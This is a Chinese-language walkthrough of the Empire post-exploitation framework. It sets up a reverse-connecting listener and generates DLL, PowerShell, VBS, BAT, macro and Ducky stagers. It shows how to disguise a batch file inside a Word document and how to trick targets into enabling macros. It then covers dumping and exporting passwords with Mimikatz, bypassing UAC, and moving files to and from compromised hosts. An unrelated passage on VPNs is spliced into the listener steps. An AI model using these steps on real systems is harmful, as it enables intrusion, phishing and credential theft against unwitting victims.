Empire:设置监听,生成木马,然后在目标主机运行该木马,监听会连接上反弹回来的代理
( 与 msf 监听模块handler 类似)
1.在 Empire目录下,输入 ./empire 打开
2.输入 help 查看具体的使用帮助
监听
3.建立监听,输入 listeners,help 查看帮助文件
4.输入 uselistener 设置采用何种模式, 通过1次空格和2次Tab 可以看到所有可使用的模式,选择 http 监听模式,输入 uselistener http ,然后输入 info 查看具体参数设置
5.使用set 命令设置相应参数 ,设置 name,Host, Port
虚拟专用网络(VPN:Virtual Private Network)的功能是:在公用网络上建立专用网络,进行加密通讯。在企业网络中有广泛应用。VPN网关通过对数据包的加密和数据包目标地址的转换实现远程访问。VPN可通过服务器、硬件、软件等多种方式实现
工作原理:通常情况下,VPN网关采取双网卡结构,外网卡使用公网IP接入Internet
set Name shuteer //监听名称
set Port 4444 //先设置port ,Host端口会自动一样
set Host XXX.XXX.XXX.XXX //empire服务器的ip;VPN分配的ip
? 
6.设置完监听,接着生成木马在目标机中运行。(类似:metasploit 的 payload)Empire里有多个模块化的 stager,接着输入 usestager 来设置采用何种模块。同样通过 1次空格和2次Tab 可以看到所有可使用的模式
其中 multi 为通用模块,osx 是 Mac 操作系统的模块,剩下是windows 的模块
木马
(1)DLL木马
输入 usestager windows/dll,之后 info 查看详细参数
设置 listen,执行 execute命令,会在tmp目录下生成名为 launcher.dll 木马
? 
(2)launcher
?如果只是需要简单的 powershell 代码,在设置完相应模块后,可以直接在监听器菜单中键入 launcher <language>? <listenerName> ,将很快生成一行 base64 编码代码。回到 listener目录下,输入命令:生成 payload
launcher powershell shuteer //当前设置的 listener 名称
?在安装 powershell 的目标机中(win7+防火墙)执行生成的命令,就会得到这个主机的权限
?可以看到 Empire 上线一个 Name 为 UTNMDC49 的主机(杀毒软件无提示),输入agents可以看到目标主机上的具体内容,这里的 agents 相当于 msf 的 sessions
(上线主机)
代理 Name 取一个随机名字,可使用 rename <oldAgent Name>? <newAgent Name>命令修改
(3)launcher_vbs 木马
想设置 launcher_vbs 木马 ,先输入 usestager windows/launcher_vbs,键入info
?设置 Listener 参数,默认在 tmp 目录下生成 launcher.vbs
(set Listener shuteer)(execute)
输入 back 返回 listener 下开始监听,将生成的 launcher.vbs 在目标机上打开,就会得到主机的权限。(win7双击vbs文件)运行后,launcher.vbs 木马成功上线
如果要生成 powershell 代码,跟前面一样,设置完 listener 后不用输入 execute,直接输back,键入 launcher powershell shuteer
?
(4)launcher_bat 木马
前面的步骤跟上面 launcher_vbs 一样
usestager windows/launcher_bat
info
set Listener shuteer
execute
back
?为了增加迷惑性,也可以将批处理文件插入一个office 文件中,这里随便找个 word 或者 excel 文件,单击“插入”标签,选择对象,然后选择“由文件创建? 单击“浏览”,选择刚才生成的批处理文件,勾选为“显示为图标”,最后单击“更改图标”换成更具诱惑性的图标
?? 
? 
在“更改图标” 界面里,选择一个图标(建议 execl,word,PowerPoint)更改名称,扩展名可以为 .dox。单击确定后,该对象就会插入 word 文件中
在 listeners下监听,将该word文件发给目标,一旦该word在目标机上被打开,并运行了内嵌的批处理文件,就会得到这个主机的权限。
(5)Macro 木马
设置 Macro 木马,输入以下命令
usestager windows/macro
info
set Listener shuteer
execute
back将生成的宏添加到一个office文档里,打开word --> 视图 --> 宏 -->? 查看宏 --> 宏名(随便)--> 宏位置(当前文档) -->? 创建
弹出 VB 编辑界面,删除原来代码,将生成的宏复制进去,另存为 “word 97-2003文档(*.doc)” 文件
? ? 
?修改好的 word 在目标机上执行,打开后会提示一个安全警告,诱导目标点击 “启用内容”
启用内容点击后,就可以被监听到,目标机已顺利上线(360安全卫士会发现宏病毒)
?删除该主机,可以使用 kill 或者 remove
?
(6)Ducky
支持 ducky (小黄鸭)
usestager windows/ducky
info
set Listener shuteer
execute
back
连接主机及基本使用
7.目标主机反弹成功后,使用 agents命令列出当前已连接的主机,带 * 的是已经提权成功的主机
使用 interact 命令连接主机,可以使用 Tab键补全主机的名称,连接成功后输入help命令即可列出所有的命令
主机功能兼容了 Windows、Linux、Metasploit的部分常用命令
pwd //(1)全称:print working directory,打印当前工作目录(所在目录)
help agentcmds //(2)可供使用的常用命令?
(3) 在使用部分cmd命令时,要使用“shell+命令”格式
(4)存在内置的 Mimikatz模块,输入 mimikatz命令
(5)输入 creds 命令可以自动过滤、整理出获取的用户密码(域,服务器,用户)
(6)creds 命令后 1次空格和2次Tab键 可以看到一些选项
在内网抓取的密码比较多又乱的时候,可以通过命令对 hash/plaintext 进行排列、增加、删除、导出等操作,这里将凭证存储导出,输入 creds export 目录/xx.csv
(7)在实际的渗透过程中,总会有部分主机丢失或失效,可以输入 list stale 命令列出已经丢失的反弹主机,然后输入 remove stale 命令删除已经失效的主机
(8)提取 Bypass UAC
UAC(User Account Control)是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。
UAC需要授权的动作包括:配置Windows Update;增加或删除用户账户;改变用户的账户类型;改变UAC设置;安装ActiveX;安装或移除程序;安装设备驱动程序;设置家长控制;将文件移动或复制到Program Files或Windows目录;查看其他用户文件夹等。
在 interact之后使用help可以看到 bypassuac 命令(提权)
bypassuac <监听名称/ID>
?
?
(* :提权后的标志)
?(9)sc截图命令
? 
?(10)download下载(从目标机中下载文件到攻击机)
??????????? upload上传(从攻击机上传文件到目标机)
(未提权agent默认shell路径)
(提权agent默认shell路径)
使用 download命令,需要先将shell 路径移到下载文件当前目录下(cmd操作)。之后直接download文件就行,无法选择攻击机保存文件的路径(默认路径为)
shell cd XXX //路径
download XXX //文件名称
? 
?
?忘了也没关系,命令 find -name 文件
?upload 命令:upload + 路径,目标机保存位置在upload 之前先确定好。
?
? 